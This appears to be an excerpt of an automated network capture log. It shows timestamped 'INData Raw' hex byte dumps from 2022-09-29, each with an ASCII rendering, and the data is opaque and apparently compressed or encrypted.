                                                                                                                                                2022-09-29 12:51:45 UTC23737INData Raw: 09 bb 9e b0 11 75 15 a5 ac 45 5f fa 31 32 40 0e 79 68 50 d9 6d f2 63 f7 ea f5 29 a8 1e 13 cf f8 7f 0a 57 c3 c0 eb 6d 4a 77 0e 1b 4c c5 89 a4 34 b4 3b 53 97 c4 fa 0a 6e 40 5d ec d6 6d a5 35 1c c5 ce 70 4d 5e 7d b5 00 84 24 7a f2 7f 3d 00 d9 3c 84 d4 66 a4 4f e3 70 a6 31 0c ac 3b 34 04 49 78 64 58 a8 b1 5f 28 cd 08 df ac 47 3c b8 f1 91 6c 0d b8 6f 1d 82 0f d1 25 01 3b ac ea 1e c0 9a 24 f4 b6 3c 02 a0 41 d9 1d 9d e0 a2 83 52 f3 26 63 bd 98 01 5f 18 38 67 e4 e1 31 3e d9 6a 99 18 93 03 4c 78 82 28 4e 5a e9 fb d7 e4 fb 45 97 f9 05 3e 60 a1 e5 1d 79 d0 6b 2c 57 b8 4a 3f 61 19 77 76 36 6a 36 ff ff 65 ef 98 da 97 1d 25 94 3b bc 7d 7d 50 37 18 1b ec c6 04 d9 99 1c 7d a8 b3 c1 61 3f d3 29 d9 fc 5e 27 7b f8 09 60 d1 14 e6 0c f7 eb a7 2c 94 63 d0 78 64 f9 e1 85 97 72
                                                                                                                                                Data Ascii: uE_12@yhPmc)WmJwL4;Sn@]m5pM^}$z=<fOp1;4IxdX_(G<lo%;$<AR&c_8g1>jLx(NZE>`yk,WJ?awv6j6e%;}}P7}a?)^'{`,cxdr
                                                                                                                                                2022-09-29 12:51:45 UTC23753INData Raw: b1 c2 4b e1 f3 d1 ca 2d 47 60 58 0e 93 cf 16 5b cf e4 7c f3 34 bc 24 85 1b e4 2b d4 63 4f 96 61 75 4b 76 17 92 cf 49 43 85 26 c5 6d df 61 b7 61 1f 20 95 a2 8e aa 8e dd f6 a8 15 27 5e 0f 7b 84 fd 6b c0 ce 92 bd 29 0a d4 34 2e ce 15 2b a8 81 5b eb 8f 40 ee 81 5b 8b 31 24 2c f5 fa 0f 1e ba a8 ea 05 a2 eb 01 b9 a0 42 d6 7b f7 42 c2 ca de a3 c7 0d 2d 60 f8 a3 c3 d8 d6 5a 29 19 9e 04 78 cb b6 0f 94 92 df 53 1d 2d fc 00 a1 48 2c 4f 8f 7c 01 02 d8 b8 0b 49 08 8d 76 a1 e1 c6 7c 81 c9 cd 17 e6 59 04 f2 5d 8f 1e 6a 40 4e da 25 9b 21 76 7d 36 8a 71 2b 29 43 cc 69 b9 23 79 81 3d 4f 6d d8 69 28 db 3c fc eb 19 01 0d 34 cb df 11 dd 92 a6 6b 63 d8 ab 3b 63 4b 7e 9c b6 aa 81 be e8 54 33 bb f6 db ba 4a 08 5a 18 7b d6 f8 30 d9 8e d4 6d ea de 76 24 03 53 62 34 1a 87 0d f6 ef
                                                                                                                                                Data Ascii: K-G`X[|4$+cOauKvIC&maa '^{k)4.+[@[1$,B{B-`Z)xS-H,O|Iv|Y]j@N%!v}6q+)Ci#y=Omi(<4kc;cK~T3JZ{0mv$Sb4
                                                                                                                                                2022-09-29 12:51:45 UTC23769INData Raw: b8 75 ee 63 28 e2 c2 0b 91 c3 14 a7 38 df 46 d2 f3 a1 5f 40 bb 11 ff 53 68 0f fe 03 be 1d c6 08 61 ef e1 dd 24 b2 e8 78 73 fc 94 f4 0d da e9 0a 72 25 cb 6b 16 91 6c f2 10 02 f0 de 9d 14 2d 2f a5 47 d1 c0 c9 6a f9 a8 1b 60 dc 90 59 ea a6 2e b6 c4 01 2f fc 39 b2 2b 8f 22 2e b4 00 04 fd 5a 46 a5 17 bf 19 44 4d f1 27 91 ee c7 8d 8a 7d 01 34 b4 7c d5 ea 2a 87 e6 31 42 ee 0d 47 95 6c 8c 47 bd 6f 25 48 bb 81 52 0b a5 24 67 e1 e4 41 e3 cd f3 bd c3 5b 22 93 f3 81 27 86 7c 25 9f 0e 09 b6 ba b4 6b d7 a1 4f cc ab 76 de 14 07 3c e7 be a1 c9 2d 0d 76 ac 3a 11 84 ef 96 ed cf 2f 97 17 e6 44 88 9c a5 bf 8b 06 d8 95 45 60 96 80 74 2a fb 23 bc 34 15 3f 05 01 df 98 63 c3 b5 6f 26 83 9c 7b 44 02 1d 00 b0 bf 40 36 22 dc c0 84 8b 50 dc fd 0e c0 12 11 07 cd af 65 7b d5 a6 49 61
                                                                                                                                                Data Ascii: uc(8F_@Sha$xsr%kl-/Gj`Y./9+".ZFDM'}4|*1BGlGo%HR$gA["'|%kOv<-v:/DE`t*#4?co&{D@6"Pe{Ia
                                                                                                                                                2022-09-29 12:51:45 UTC23785INData Raw: b6 e5 7f 2e 39 59 63 6f 2d a7 28 9a 10 59 3e 6d 06 76 2c ba 12 9d d4 a5 fa 59 c9 7d 81 be f4 20 72 4b ad e1 15 19 6b ad cf fa 5b 5c 59 22 57 64 67 3d c5 a7 0c 91 46 9a df aa 51 36 10 67 e8 d1 d3 39 5f 13 0e 13 b6 2f fe 64 bf 81 e9 27 c8 76 10 6e da 4f ca 64 63 71 cc b2 c5 9f 10 44 fb 53 36 e7 bf 62 91 0b 40 46 53 97 1d ab ab e5 fc 88 27 c2 be e4 ea 42 8b 42 f0 17 b1 26 94 d5 42 cf 7c 5d 31 c4 30 bc 51 c5 74 db af 0d 22 8e 4b c1 28 0c ca c3 3b 05 e0 a1 7b 91 f2 5c 61 d5 82 35 fe 5d 53 e7 83 be 5d e0 a7 9a a6 df d3 e4 0b 0c 9f d4 87 15 64 52 23 a8 c5 e5 6f 23 0b 4b 6c 8e 34 d7 82 00 4f 38 63 07 78 b0 2d b6 92 d2 61 3d 2c f4 56 f9 f0 69 15 7d 95 c0 d6 e8 42 af 6c 3b ba c1 49 56 4a a1 ac 9e dd d9 1b 1d 2c e8 02 31 dc d7 7c a3 45 d4 93 3d ac d0 44 43 57 10 1a
                                                                                                                                                Data Ascii: .9Yco-(Y>mv,Y} rKk[\Y"Wdg=FQ6g9_/d'vnOdcqDS6b@FS'BB&B|]10Qt"K(;{\a5]S]dR#o#Kl4O8cx-a=,Vi}Bl;IVJ,1|E=DCW
                                                                                                                                                2022-09-29 12:51:45 UTC23801INData Raw: 1b 36 ae 56 95 37 8e 08 ee 41 c6 ee 0d ed be 05 1f 38 e7 95 18 bc ef 0c 68 b5 d3 37 46 ca 64 bb d3 49 e5 14 df 32 72 90 91 92 90 49 89 84 52 17 f6 c4 49 03 c6 c4 cf e8 03 65 de 3d b6 17 31 92 ce 12 d3 4b 12 7b 43 3f ab 16 8d d2 b2 07 b3 24 0a aa 2c fd 2c 8b 01 13 c9 42 15 a0 ea 9a 6e e3 8e 66 65 83 63 91 26 f0 c6 37 33 d0 d1 ce e3 fb 96 ce 4d b1 45 a8 c1 74 f6 23 fa e6 4c 49 3f 49 fe 43 33 08 d8 b7 34 69 cb d2 b7 87 89 fd 87 53 a4 88 14 32 fb 89 63 11 5e 08 2a 7b a6 a8 0c 3e 3b 6a 52 d8 26 66 de cb ed 94 6a 44 fa 94 09 fe 6c dc 7e 34 90 62 ea 3f 8f 86 91 07 29 90 4f cc f5 be 68 ad 4b 9c 71 07 00 b2 cc 2a 4b d6 60 a3 9a 41 1c af 8a 42 5e 5e 51 fc 64 0a f2 61 5b 0c 1b 3a 5a e7 e7 22 78 01 24 a2 11 7f e0 df 96 51 0c fe 62 cd f8 0f 5c e6 d4 52 d1 cd d1 ea a3
                                                                                                                                                Data Ascii: 6V7A8h7FdI2rIRIe=1K{C?$,,Bnfec&73MEt#LI?IC34iS2c^*{>;jR&fjDl~4b?)OhKq*K`AB^^Qda[:Z"x$Qb\R
                                                                                                                                                2022-09-29 12:51:45 UTC23817INData Raw: fe 04 a9 81 2d 1a e5 ae c0 5b 9f 25 8f 84 56 dc 41 47 11 c5 9a 2e 88 6c 0b 59 da d5 8d 86 2b 6e be f6 e8 e3 84 26 af c0 e3 42 d6 86 4f 3a f2 68 6f d4 fd 40 ed 72 33 f1 18 3b eb f8 1b 11 07 40 6d fb 68 f0 40 17 c4 9d c0 14 fa 7a fd 5d e2 04 98 0c 2a 92 2a 82 f0 db 41 6a b5 28 71 73 e2 74 be a5 a4 7a eb 3e da fc d9 51 6a cc e2 9e bd 92 1e 3c c5 c1 92 de e7 4c 2e 1b 19 7e 4c 1a 20 ed c5 17 4c 9a a4 cc 8f e4 85 2e 40 44 b4 91 a7 d4 1c 33 17 fe 2b 82 45 ce 7d c8 b6 26 50 b8 eb 1b 31 0b 5c ad f9 2c f0 6a 24 9f 70 2f 3d cb 7c 32 58 05 9a c2 a7 c5 93 86 cc a1 93 f8 46 b9 69 63 98 82 55 29 3a 44 2f b1 04 f9 f6 4f c7 8e c4 5a 3a 6e 4b 35 b5 47 06 0a 5f 35 12 b5 d9 bc 92 a2 dc e9 b5 74 04 19 c5 9c df 9d f3 9b fa fc fc 51 0c b8 a7 8d a7 b4 67 bb 2f 9d 5d b0 3c e2 18
                                                                                                                                                Data Ascii: -[%VAG.lY+n&BO:ho@r3;@mh@z]**Aj(qstz>Qj<L.~L L.@D3+E}&P1\,j$p/=|2XFicU):D/OZ:nK5G_5tQg/]<
                                                                                                                                                2022-09-29 12:51:45 UTC23833INData Raw: 16 af e9 be 1c e9 5f 2c 71 97 41 cb 63 be eb 23 c4 7a b1 92 7d 67 be d4 2c d5 f3 2b ef a2 53 26 e5 54 1f 61 49 51 2d 6c 0d 31 e7 c6 82 e1 b7 26 23 8f e2 2f 7b b6 f7 9f e5 d7 56 7f 32 36 47 d1 b8 75 31 a7 fd 18 c7 0e 3c 98 47 ae 4e 3b af d5 b3 3b ea 6d 5d d0 c4 33 7c e1 42 1d 43 66 17 1c 5a df d0 c4 86 64 16 c9 e2 fe 08 24 91 36 b7 e8 c9 72 49 a0 08 ed bc 34 75 ef 1f 1e 2d b2 bc 73 9e 8f c2 91 42 56 ec fc 06 7e 4c 5f ce 59 06 80 7f 0d a6 29 a2 65 28 4c eb 3f 86 24 72 2b 61 15 5f 09 5b aa bb 7a 0a 99 b0 13 6d c4 46 02 86 e3 15 ce 25 15 ff f9 09 7e 61 76 f6 a0 52 5a 12 88 90 a6 5d ed 78 66 a0 78 9d 43 5e 7c 03 74 39 c4 0d f9 09 15 84 e2 a7 16 30 54 79 5b b2 22 85 a2 fb c5 83 c7 a7 36 6d c3 62 96 a5 c0 16 71 11 ce 4e 25 d7 9e 99 d8 b6 20 59 0d 3b be 04 06 29
                                                                                                                                                Data Ascii: _,qAc#z}g,+S&TaIQ-l1&#/{V26Gu1<GN;;m]3|BCfZd$6rI4u-sBV~L_Y)e(L?$r+a_[zmF%~avRZ]xfxC^|t90Ty["6mbqN% Y;)
                                                                                                                                                2022-09-29 12:51:45 UTC23849INData Raw: 68 36 38 16 cd 5c f8 6b 50 44 b2 da f7 a8 a4 57 29 fd 94 fc 30 f0 5c ff dd e4 d8 e7 45 e1 8e be 03 0e f0 6e 71 cc 6e 4e 68 e7 85 b9 2a cb 74 9a 72 24 05 2b 10 e9 b6 2b 61 e1 0b 40 41 c3 fc 0a ae 61 5f 56 2b 70 1a 15 34 38 7b 35 32 37 e6 a5 15 aa ae ba 57 13 4d c6 d2 66 0c 31 b9 89 60 53 7d 21 37 1a 21 3a 9d 90 b9 71 26 af cf 59 fb 01 f5 ed 14 1d 49 d7 62 75 6f c8 b0 31 18 c4 9a a6 2d a5 5b 52 67 04 92 8b e3 34 f8 bf e4 e8 e7 4f 16 91 24 0e 4f 49 ab ba 20 f9 f3 eb fd c4 24 c9 7d 19 c4 16 72 e6 0e f7 76 81 ae b7 ae 17 53 c8 da 1f d2 96 41 14 6d b1 da 5d 43 ce 52 44 8e 60 ac 77 42 1d 5f 44 fe aa d2 63 a9 99 f6 3c ac f0 de ca 4b bf 62 b8 9d eb 5e 7c 8c f0 c0 5c 77 e5 2a c9 04 7c 77 98 2f c8 9d e5 6a 5e d0 5f c8 f9 b8 b7 e2 17 de 16 1f 5e 7b e6 f1 2b af 02 76
                                                                                                                                                Data Ascii: h68\kPDW)0\EnqnNh*tr$++a@Aa_V+p48{527WMf1`S}!7!:q&YIbuo1-[Rg4O$OI $}rvSAm]CRD`wB_Dc<Kb^|\w*|w/j^_^{+v
                                                                                                                                                2022-09-29 12:51:45 UTC23865INData Raw: 96 29 e0 6e 0a ec 4f a2 3d f3 cf ec b0 6c 6b 1f 6c 6e 91 43 81 d3 69 8f 2f b8 06 34 ea 99 ba fe 09 99 3c 44 36 8e 08 5a b0 53 56 df fd 28 65 9a c5 3a 35 d9 4e 91 08 24 69 6d 3c bb 11 4a ae a2 bc ec 2b bc 17 05 2c b5 5e e8 09 0c 8d dd db 94 80 fb b3 b2 e2 b9 eb 9b 37 da 3c cb 11 d0 0f 33 bc 9b 61 6d f3 4d be 2a 7a d4 50 53 d6 ce b4 a4 b1 50 bc a7 f8 ec f3 0e 6b 11 b9 ee 46 fe 54 24 2a 07 b5 8e 51 d2 5e cc 3c 9e f6 f2 58 f4 a7 f1 a0 c8 1c b5 a8 56 fe e0 c5 74 d0 17 7c 49 f7 30 2e c6 21 e9 eb 02 c8 d9 8f d4 bc 0c c5 47 80 6f 0d 48 23 2d 1f f3 73 5c dd 3a 55 37 4d ac da c5 78 90 fc cd 1d 03 51 46 02 a1 1e 33 d8 29 29 5d 53 af 09 6d 0c 41 57 e2 1b f6 49 eb d5 75 b7 5f 62 1c 9f ae ac e6 49 38 07 80 43 4a 94 cf d7 f0 9b ab 15 e7 d3 c8 7b 20 55 8e 8f 34 1a 7d ca
                                                                                                                                                Data Ascii: )nO=lklnCi/4<D6ZSV(e:5N$im<J+,^7<3amM*zPSPkFT$*Q^<XVt|I0.!GoH#-s\:U7MxQF3))]SmAWIu_bI8CJ{ U4}
                                                                                                                                                2022-09-29 12:51:45 UTC23881INData Raw: ba c1 e2 43 89 6d 6d fb 1f b1 b6 c3 fe ef ce 4c 2e d0 7a 14 a1 9b b1 80 5e 99 44 27 51 7e e2 ec de ab a5 88 89 c9 6d 3f 4b 81 b8 32 e8 be b8 44 2e 45 df 3f dd f0 4e b9 d7 3f e4 c3 44 47 ec 88 f5 bf 88 77 25 90 bb 13 b6 a9 3c f3 99 1c 4a 50 84 ba 5e 52 2c a7 79 4b 12 3f 3c 91 22 2e d4 ba b5 57 01 e8 b4 09 c6 a1 e6 da d8 dc 64 05 bd a9 ba a7 d0 77 7f 5a 0c 81 dc d7 f1 34 cf 24 ec b0 fa b2 5d a5 e5 41 d7 ac 8c b1 94 c6 dc b9 8e 9b a1 a7 00 1a 52 a4 b5 fa 1a 4e 15 15 92 17 9b de 5c 66 5d 6c f3 30 ab 46 ad fd b9 f8 fd bd 28 68 bf b3 0e e0 5b f0 14 33 b5 09 3e fc b3 a5 45 83 a0 55 56 5b a3 74 1c 3d 97 b6 f7 ca 7c b3 d1 c6 d6 e5 46 79 5f 89 92 ae 4f a6 c5 16 15 8d fd 68 f9 c0 e4 d6 ec 41 be d6 90 8f 60 48 f3 11 cb 40 63 84 9e fd 14 50 cc 6c 7f 9d 02 91 cd e4 bf
                                                                                                                                                Data Ascii: CmmL.z^D'Q~m?K2D.E?N?DGw%<JP^R,yK?<".WdwZ4$]ARN\f]l0F(h[3>EUV[t=|Fy_OhA`H@cPl
                                                                                                                                                2022-09-29 12:51:45 UTC23897INData Raw: fa 5d f4 cb 16 fa 35 93 e8 ec 55 47 49 5b a0 01 a6 8d 6e 40 74 b9 e9 6a 92 01 f2 69 57 d9 ef 90 ce 1f 72 25 25 62 a3 8b 9e cf 5f 07 fe ad 16 20 f6 05 54 49 a8 ea ae 4c 32 65 85 9e d2 27 e5 c3 fc 78 58 aa b7 9c cb 30 b8 b1 7c 4b cf 56 dd ac 7c ae 24 bd 31 8b d6 03 61 3b f8 c1 66 a5 34 5d e6 17 c8 cf 76 b1 6b 6a 80 55 9c 24 46 a1 a1 af af 64 a7 00 b4 c9 16 8d 72 4d a9 81 78 34 51 e7 9e 6c b3 4a 37 43 ea 20 32 0a ad 15 01 77 aa 5c 30 fd d7 96 e8 65 bf 37 4f 6a 52 99 04 49 d3 6b 75 b0 4c b5 5d 77 78 04 56 90 bc 1f 4e 08 f3 13 44 ed e9 68 dd d0 34 6a e8 59 d1 a2 35 87 cc a1 d9 4c c9 f9 3b 23 ad 52 85 b1 f2 00 e0 ad ce f6 45 3c f6 c2 0d 3a 5a 36 43 4b 20 16 a2 e5 a1 dd ed 3a 6b d0 81 5d 07 6a 47 42 c1 65 b3 6d 72 88 75 1d 63 69 1b 36 9b d3 3e 62 96 b8 2f e6 6a
                                                                                                                                                Data Ascii: ]5UGI[n@tjiWr%%b_ TIL2e'xX0|KV|$1a;f4]vkjU$FdrMx4QlJ7C 2w\0e7OjRIkuL]wxVNDh4jY5L;#RE<:Z6CK :k]jGBemruci6>b/j
                                                                                                                                                2022-09-29 12:51:45 UTC23913INData Raw: 28 2b f7 6d 54 cd 83 20 e5 76 9a 9d 9c 56 bc 22 f1 8d 36 5f d9 8b 81 42 06 78 43 c7 6e fb 5f 82 99 71 ff f4 da 85 dd 09 f8 6d 4a f3 5d a2 fc 71 ad 27 d2 88 90 bd 50 10 47 11 18 58 82 f6 7e a4 8a 8a 64 57 2c 04 18 f1 3c 56 21 d9 ef 6a 31 bf c2 e5 ca 01 22 17 cb f5 9b a9 a0 d4 26 68 6c e0 07 b5 ab 9a 16 58 cb b0 fd 73 da 45 9d df 80 32 fc 0f 41 66 05 46 3c 55 8e 2d 52 a3 49 dd 24 30 84 ca 26 43 4a e9 64 7c a8 9e 03 c5 e1 27 49 3e 35 6e be b0 1a db 22 88 10 89 2c 63 b2 f9 d0 73 d0 6c 25 8d c0 5c 1a c3 e6 84 4d f2 41 92 e6 3a 65 5e 32 6f ad f7 d3 73 b4 e4 ea 3d 5c 4c 58 39 3f ae 7a b5 05 56 99 7a 50 e7 7a ee 9f e7 b6 61 3d 48 63 db 25 97 67 98 90 4f bb 24 c3 52 16 cc 41 08 73 c7 c6 5b 4a 37 ab 36 7c 67 15 26 aa bf 40 b8 0e a9 2a 56 c8 79 92 dd dd a7 aa 4a 2b
                                                                                                                                                Data Ascii: (+mT vV"6_BxCn_qmJ]q'PGX~dW,<V!j1"&hlXsE2AfF<U-RI$0&CJd|'I>5n",csl%\MA:e^2os=\LX9?zVzPza=Hc%gO$RAs[J76|g&@*VyJ+
                                                                                                                                                2022-09-29 12:51:45 UTC23929INData Raw: f4 da ab 8a 17 c7 e6 7d 36 5a 27 09 4e 84 e8 4b 44 58 67 73 f7 31 e1 71 d8 a0 8b 01 20 02 74 b8 39 c6 d7 17 b1 df 1b 40 ae 2b 87 f7 15 47 21 91 f9 a7 23 23 6f ad 90 4e dd 2b 94 d9 a9 1e 54 13 5b 2f b6 12 e0 42 28 02 5c 1e 1a 84 0a 1f ac f1 ba 4b d5 9f 26 ff 26 a8 51 7e 79 6f db e3 22 f7 de 17 ae 61 3c 39 f4 07 46 e8 8f df 09 f4 0c b3 0f 0c bc 6e 4d 10 e7 09 dc ab 67 65 6d 14 4d 8e 76 af 9c d2 a9 7e 0f 25 a8 3c 80 cf e2 9c 80 ae c2 4e cb 24 9a 40 29 c4 13 2f cf be 55 3a 53 d0 17 3b f5 28 34 53 25 84 12 71 00 a8 b5 58 65 04 ec c9 2a b7 ec 00 9b 2d f8 eb 39 38 6f 2a e4 e4 ee 60 db 63 4a 49 87 5c 5d 44 31 12 d5 e8 99 f3 5c c9 a8 9f 0b 58 54 6e 8c d1 1a 5d 94 b6 1f 8e 03 39 b6 57 6f 78 d5 53 e9 a6 9f 79 7f c1 5f 99 41 b3 00 9e b4 7d 61 67 0d 3d e9 57 41 ab 25
                                                                                                                                                Data Ascii: }6Z'NKDXgs1q t9@+G!##oN+T[/B(\K&&Q~yo"a<9FnMgemMv~%<N$@)/U:S;(4S%qXe*-98o*`cJI\]D1\XTn]9WoxSy_A}ag=WA%
                                                                                                                                                2022-09-29 12:51:45 UTC23945INData Raw: ae 4a a0 8a c4 6a bf ab 47 c0 67 4b 26 b7 27 b3 4f 93 10 68 d2 f7 ae e2 27 18 8c e3 3a 3b 3a c8 f0 40 70 f8 f2 b4 4c 91 d4 59 b4 88 49 73 64 90 1e b0 32 04 1f eb df 4b 38 e5 a3 5b ca b9 1f a0 57 83 63 74 bd 2d 23 be 12 90 d0 0f 08 96 cb 83 ea 5a b8 f8 12 ca 61 94 2d ad d1 01 44 14 39 2f 30 d5 68 43 45 2c e8 10 9a 49 91 7e f0 76 e4 37 cb bc 30 bc 12 91 c4 d7 97 e3 71 22 3e ec 10 0c 9b 47 e7 e6 55 d5 56 de ed 6d aa a5 36 cc 6d e5 1d 74 b2 8d 1a 8a 6a 84 b8 a6 4c 12 5a ec a4 38 4a 3f 8f 45 22 41 34 19 2b 70 aa 49 42 5f d4 61 71 5f 74 5d f4 26 f6 fc 46 a9 c0 03 52 e9 b0 e5 78 9b 22 5d c1 81 a7 fb d3 62 9b 45 17 fb ea 4e 27 61 04 ca 92 21 b6 41 34 c8 85 e7 d6 7d fe c5 c6 53 18 96 35 10 21 d6 07 cb 65 13 5b b4 b1 e0 93 3f dc 66 69 fe e4 8c 29 2a 83 5a 41 f6 4f
                                                                                                                                                Data Ascii: JjGgK&'Oh':;:@pLYIsd2K8[Wct-#Za-D9/0hCE,I~v70q">GUVm6mtjLZ8J?E"A4+pIB_aq_t]&FRx"]bEN'a!A4}S5!e[?fi)*ZAO
                                                                                                                                                2022-09-29 12:51:45 UTC23961INData Raw: eb ce 96 98 f3 58 c8 3d 7d 8d 7d c5 50 03 26 f9 bd 92 de 25 6f c5 b2 a1 10 7e fb b5 ec 56 b8 73 da 4e e0 be 20 f3 2f 94 ad ec 08 bf 5f 38 ce 5d f4 de 9a d7 25 a2 0d c2 d6 55 b6 15 3d f5 45 db b4 9b 8a af 3c e4 d0 af b5 64 d4 d4 f6 c9 70 2a be d1 71 d2 75 ce 86 30 df 15 d7 ab 1b 42 ce e3 23 86 e4 51 24 56 85 0f 36 90 c6 83 5c d1 3c 1c 63 ac 7b 4b fc 01 2d d3 ba 82 5c 92 30 43 81 b0 a9 ed 78 60 5b f1 aa b1 5e 98 18 82 5a b8 1d 91 52 d6 2a 7e c9 62 cb fb 16 89 6c 36 66 d9 46 b0 41 cb 13 10 da 76 93 00 41 04 06 00 b9 a5 3e 9c 83 58 41 36 6c 66 0d 59 ec 8b 85 b1 f2 a5 2b 0f 6c 76 7e b1 29 12 a2 6d 91 22 c0 08 f6 ed e3 21 04 c5 5b e3 b9 36 be b1 59 2c 95 31 89 f8 c7 fa 6f ce 6a 35 b8 f9 95 33 43 6f af 8a 58 6d 32 90 e2 ac 19 81 3a 23 53 ce ec 41 54 ea f6 00 41
                                                                                                                                                Data Ascii: X=}}P&%o~VsN /_8]%U=E<dp*qu0B#Q$V6\<c{K-\0Cx`[^ZR*~bl6fFAvA>XA6lfY+lv~)m"![6Y,1oj53CoXm2:#SATA
                                                                                                                                                2022-09-29 12:51:45 UTC23977INData Raw: 71 8b 17 5d 72 bb 4e 30 6a 04 bd 17 a0 d2 9d a3 84 93 ce 61 f8 94 ec c8 4b 9e cb 9a 85 2a c6 08 c4 db d0 af 26 2c ed 36 64 03 53 a6 3d 79 93 8d d4 c9 61 32 d5 37 11 71 4f e7 27 67 3d eb 73 ca d2 be 39 18 f3 bb e6 88 b9 1d 97 24 ae 89 a0 19 15 4b 85 a5 4e bc 64 7f 58 a8 62 5a 29 6d 3b d5 1d 88 e1 67 2a cc 49 09 74 d2 db cf de 8d 19 d9 40 69 f3 b8 e6 81 70 c1 3c 62 ec 55 1d 6f e7 a1 b9 b9 68 f7 06 72 d2 6f 41 4e eb 2c 38 d9 c7 b0 13 c0 65 21 77 53 23 58 2d 16 f9 8e f3 32 b1 7d 55 18 a8 f9 a6 94 f9 f8 ed f3 78 3a 0b 61 36 95 b7 23 a6 5b 05 7b 90 bc 48 fb 90 e1 00 75 a0 5c 33 0c 08 fe 1f d8 b1 60 d4 90 f0 47 ae 23 50 39 b1 44 18 3f 4d 1d af cf 9e 5f a1 3d b7 f4 de 05 6c cb 68 15 56 b7 60 9b c3 dd 34 a2 9d ec ca 59 78 d6 b7 f2 55 f4 a5 6e 9e ab 82 3b 31 fd d7
                                                                                                                                                Data Ascii: q]rN0jaK*&,6dS=ya27qO'g=s9$KNdXbZ)m;g*It@ip<bUohroAN,8e!wS#X-2}Ux:a6#[{Hu\3`G#P9D?M_=lhV`4YxUn;1
                                                                                                                                                2022-09-29 12:51:45 UTC23993INData Raw: be 63 49 b7 5a 71 a3 11 2e 30 3c 7d d7 a8 94 03 43 a3 ce a0 26 a2 73 dc 44 05 d8 c0 1f 0d 73 77 98 38 53 6d 46 1f 5e 6a a4 c9 3a 1b d7 b3 62 3a 5e c6 30 2b 11 71 f3 4e 22 c2 d3 ce b3 fb 4d 07 13 64 b0 95 96 71 1a 19 d2 9c 5d 7b f6 9d 47 85 81 d6 fa 69 82 63 4c b3 ec 5b 09 d9 63 f4 b9 a4 4d b3 54 0f 13 1d 63 a4 f3 a5 5a 2e 57 03 a4 10 ae 31 14 75 ca 65 e5 dd f0 33 4b 37 16 49 70 af 4b e7 15 47 b0 e2 0f 7c 41 6f 02 a5 a8 96 70 43 2b 90 1f 83 36 32 f6 c7 24 6d 33 b9 b3 4c 5f 41 49 16 25 42 69 9a 67 83 1b 76 11 2e 68 db cf 17 dc 1e b2 ff 00 b4 d3 32 9e 78 52 6f ce 67 e3 e0 3b e4 e9 77 70 cc c0 ea 8e 52 11 dc 52 64 aa e9 7e 46 e2 84 15 da b4 19 9b 11 b4 95 7b 97 a8 cb c8 45 b6 bf b3 b9 77 f1 7d a7 5c d6 c5 37 1e c9 63 88 d9 12 55 38 5f 6d 38 f1 a9 b0 dd 1f cf
                                                                                                                                                Data Ascii: cIZq.0<}C&sDsw8SmF^j:b:^0+qN"Mdq]{GicL[cMTcZ.W1ue3K7IpKG|AopC+62$m3L_AI%Bigv.h2xRog;wpRRd~F{Ew}\7cU8_m8
                                                                                                                                                2022-09-29 12:51:45 UTC24009INData Raw: 79 21 aa 60 f5 b8 3a a4 3e 7f c3 24 a1 e7 e6 e0 da 53 e4 fe eb 7d a4 b1 47 cd a2 d1 4c db 65 60 9b a2 55 ce 53 0e 34 28 9e d3 bc 8a f9 38 1e 78 64 c8 6d 94 72 2f 26 b7 52 64 0a b4 88 c5 16 e3 a5 44 3b 08 5d 30 1b 85 a9 47 06 3c 20 51 45 ca 3e bf 5a 5f 18 40 0d 42 97 b4 f0 b5 6d 8b af fc 19 2c 4f 63 85 58 0d 78 9b f7 ef 6c b0 b5 53 b9 7c a5 d2 46 6e 27 af d2 a9 ab 7c d4 48 c7 44 41 37 e6 3f 52 d6 01 6e 32 29 26 ab 39 7c de 21 7d 96 08 89 19 28 1e 19 5c 7f 62 25 f9 ca 07 24 44 06 40 39 19 7a 89 54 5f 84 cc 88 e2 43 34 f8 28 8b 0d 03 f3 1b 61 85 81 dd 34 e4 55 9f f6 e4 f8 e2 37 68 f6 c3 be d4 89 5c 4f 12 dd 68 08 c2 05 04 fd 3a 28 c1 46 78 99 f1 87 19 8b 01 3e 5e a9 db 9e d2 91 39 07 1d 93 1b 22 95 57 31 5b 70 ae cb 0e 06 58 ac d8 f1 74 32 7f bb 78 a1 c7 f0
                                                                                                                                                Data Ascii: y!`:>$S}GLe`US4(8xdmr/&RdD;]0G< QE>Z_@Bm,OcXxlS|Fn'|HDA7?Rn2)&9|!}(\b%$D@9zT_C4(a4U7h\Oh:(Fx>^9"W1[pXt2x
                                                                                                                                                2022-09-29 12:51:45 UTC24025INData Raw: c4 f5 1b 20 65 36 b5 05 12 49 1f c7 55 6b 07 a0 73 2a 57 3d ea 79 3e 9d 25 49 b9 d1 85 60 a1 77 52 3a d8 fd 25 1f 82 5e 5e 88 5e 9b 11 9a 2a 2b 74 77 5a 65 58 0a 14 d5 f0 6b 50 87 6a b8 a2 66 d6 35 fd 06 f4 b6 1d 22 b8 10 c7 ce 05 1c c7 a9 09 f7 bc 67 ab 19 02 04 28 5c 4e 43 d6 39 57 ea f2 bc d9 db ea 8f 92 56 07 3a 8c 2a dd b6 c2 57 01 f4 73 ff a4 93 ed 34 0f 1e 0a 6d ec 4b cd 63 2b 02 63 b6 b5 fe b1 4d 61 1e 07 ca 5b 46 c3 10 98 da 03 bc 85 b4 7b 9a ca d9 dc 90 f8 46 6a c6 a6 c6 eb 2d 0e 91 40 25 0e 14 f9 ee 14 30 36 be 76 8d 0b df e2 f4 65 1c ac 0e e6 9a 35 de 1e 7f d5 12 06 d3 08 75 09 a2 b5 ce 0c e9 81 5b 72 44 00 27 db 8a 97 0e fc 69 dc 1a db 68 44 be f0 1c eb 6e c5 e9 06 6c 57 19 4e e8 5f 6f 6a a4 6f ba 2d b0 96 16 0f 81 b8 ea a8 ad 10 7e 56 7a f3
                                                                                                                                                Data Ascii: e6IUks*W=y>%I`wR:%^^^*+twZeXkPjf5"g(\NC9WV:*Ws4mKc+cMa[F{Fj-@%06ve5u[rD'ihDnlWN_ojo-~Vz
